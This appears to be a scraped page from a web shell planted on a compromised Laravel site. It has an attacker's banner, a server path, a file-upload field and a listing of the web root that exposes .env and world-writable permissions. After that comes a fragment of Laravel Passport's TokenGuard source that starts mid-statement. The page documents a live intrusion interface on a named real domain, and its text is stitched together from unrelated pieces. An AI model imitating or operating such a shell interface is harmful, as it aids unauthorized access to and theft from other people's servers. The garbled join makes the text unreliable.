I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file	size	edit	permission
.editorconfig	276 KB	March 05 2024 07:12:34	0666
.env	1385 KB	May 24 2024 16:43:55	0666
.env.example	1088 KB	March 05 2024 07:12:34	0666
.gitattributes	190 KB	March 05 2024 07:12:34	0666
.gitignore	245 KB	March 05 2024 07:12:34	0666
.htaccess	947 KB	July 04 2023 21:25:08	0664
.rnd	1024 KB	March 13 2024 04:51:14	0666
README.md	472 KB	March 22 2024 10:35:00	0666
app	-	March 05 2024 07:12:34	0777
artisan	1739 KB	March 05 2024 07:12:34	0666
bootstrap	-	March 05 2024 07:12:34	0777
composer.json	2829 KB	May 13 2024 12:10:04	0666
composer.lock	417205 KB	March 19 2024 12:13:14	0666
config	-	July 03 2025 02:53:36	0777
database	-	March 05 2024 07:12:34	0777
index.php	1816 KB	May 13 2024 10:32:36	0666
lang	-	May 13 2024 14:53:26	0777
manifest.json	913 KB	May 14 2024 03:57:26	0664
package.json	398 KB	March 05 2024 07:12:34	0666
phpunit.xml	1206 KB	March 05 2024 07:12:34	0666
public	-	July 03 2025 02:37:20	0777
resources	-	May 13 2024 12:09:36	0777
routes	-	March 05 2024 07:12:34	0777
service-worker.js	924 KB	March 05 2024 07:12:34	0666
storage	-	March 05 2024 10:03:52	0777
symlink.php	218 KB	March 05 2024 07:12:34	0666
tests	-	March 05 2024 07:12:34	0777
vendor	-	March 19 2024 12:13:14	0777
vite.config.js	326 KB	March 05 2024 07:12:34	0666

server = $server; $this->tokens = $tokens; $this->clients = $clients; $this->provider = $provider; $this->encrypter = $encrypter; $this->request = $request; } /** * Get the user for the incoming request. * * @return mixed */ public function user() { if (! is_null($this->user)) { return $this->user; } if ($this->request->bearerToken()) { return $this->user = $this->authenticateViaBearerToken($this->request); } elseif ($this->request->cookie(Passport::cookie())) { return $this->user = $this->authenticateViaCookie($this->request); } } /** * Validate a user's credentials. * * @param array $credentials * @return bool */ public function validate(array $credentials = []) { return ! is_null((new static( $this->server, $this->provider, $this->tokens, $this->clients, $this->encrypter, $credentials['request'], ))->user()); } /** * Get the client for the incoming request. * * @return \Laravel\Passport\Client|null */ public function client() { if (! is_null($this->client)) { return $this->client; } if ($this->request->bearerToken()) { if (! $psr = $this->getPsrRequestViaBearerToken($this->request)) { return; } return $this->client = $this->clients->findActive( $psr->getAttribute('oauth_client_id') ); } elseif ($this->request->cookie(Passport::cookie())) { if ($token = $this->getTokenViaCookie($this->request)) { return $this->client = $this->clients->findActive($token['aud']); } } } /** * Authenticate the incoming request via the Bearer token. * * @param \Illuminate\Http\Request $request * @return mixed */ protected function authenticateViaBearerToken($request) { if (! $psr = $this->getPsrRequestViaBearerToken($request)) { return; } $client = $this->clients->findActive( $psr->getAttribute('oauth_client_id') ); if (! $client || ($client->provider && $client->provider !== $this->provider->getProviderName())) { return; } // If the access token is valid we will retrieve the user according to the user ID // associated with the token. We will use the provider implementation which may // be used to retrieve users from Eloquent. Next, we'll be ready to continue. $user = $this->provider->retrieveById( $psr->getAttribute('oauth_user_id') ?: null ); if (! $user) { return; } // Next, we will assign a token instance to this user which the developers may use // to determine if the token has a given scope, etc. This will be useful during // authorization such as within the developer's Laravel model policy classes. $token = $this->tokens->find( $psr->getAttribute('oauth_access_token_id') ); return $token ? $user->withAccessToken($token) : null; } /** * Authenticate and get the incoming PSR-7 request via the Bearer token. * * @param \Illuminate\Http\Request $request * @return \Psr\Http\Message\ServerRequestInterface|null */ protected function getPsrRequestViaBearerToken($request) { // First, we will convert the Symfony request to a PSR-7 implementation which will // be compatible with the base OAuth2 library. The Symfony bridge can perform a // conversion for us to a new Nyholm implementation of this PSR-7 request. $psr = (new PsrHttpFactory( new Psr17Factory, new Psr17Factory, new Psr17Factory, new Psr17Factory ))->createRequest($request); try { return $this->server->validateAuthenticatedRequest($psr); } catch (OAuthServerException $e) { $request->headers->set('Authorization', '', true); Container::getInstance()->make( ExceptionHandler::class )->report($e); } } /** * Authenticate the incoming request via the token cookie. * * @param \Illuminate\Http\Request $request * @return mixed */ protected function authenticateViaCookie($request) { if (! $token = $this->getTokenViaCookie($request)) { return; } // If this user exists, we will return this user and attach a "transient" token to // the user model. The transient token assumes it has all scopes since the user // is physically logged into the application via the application's interface. if ($user = $this->provider->retrieveById($token['sub'])) { return $user->withAccessToken(new TransientToken); } } /** * Get the token cookie via the incoming request. * * @param \Illuminate\Http\Request $request * @return mixed */ protected function getTokenViaCookie($request) { // If we need to retrieve the token from the cookie, it'll be encrypted so we must // first decrypt the cookie and then attempt to find the token value within the // database. If we can't decrypt the value we'll bail out with a null return. try { $token = $this->decodeJwtTokenCookie($request); } catch (Exception $e) { return; } // We will compare the CSRF token in the decoded API token against the CSRF header // sent with the request. If they don't match then this request isn't sent from // a valid source and we won't authenticate the request for further handling. if (! Passport::$ignoreCsrfToken && (! $this->validCsrf($token, $request) || time() >= $token['expiry'])) { return; } return $token; } /** * Decode and decrypt the JWT token cookie. * * @param \Illuminate\Http\Request $request * @return array */ protected function decodeJwtTokenCookie($request) { $jwt = $request->cookie(Passport::cookie()); return (array) JWT::decode( Passport::$decryptsCookies ? CookieValuePrefix::remove($this->encrypter->decrypt($jwt, Passport::$unserializesCookies)) : $jwt, new Key(Passport::tokenEncryptionKey($this->encrypter), 'HS256') ); } /** * Determine if the CSRF / header are valid and match. * * @param array $token * @param \Illuminate\Http\Request $request * @return bool */ protected function validCsrf($token, $request) { return isset($token['csrf']) && hash_equals( $token['csrf'], (string) $this->getTokenFromRequest($request) ); } /** * Get the CSRF token from the request. * * @param \Illuminate\Http\Request $request * @return string */ protected function getTokenFromRequest($request) { $token = $request->header('X-CSRF-TOKEN'); if (! $token && $header = $request->header('X-XSRF-TOKEN')) { $token = CookieValuePrefix::remove($this->encrypter->decrypt($header, static::serialized())); } return $token; } /** * Set the current request instance. * * @param \Illuminate\Http\Request $request * @return $this */ public function setRequest(Request $request) { $this->request = $request; return $this; } /** * Determine if the cookie contents should be serialized. * * @return bool */ public static function serialized() { return EncryptCookies::serialized('XSRF-TOKEN'); } /** * Set the client for the current request. * * @param \Laravel\Passport\Client $client * @return $this */ public function setClient(Client $client) { $this->client = $client; return $this; } }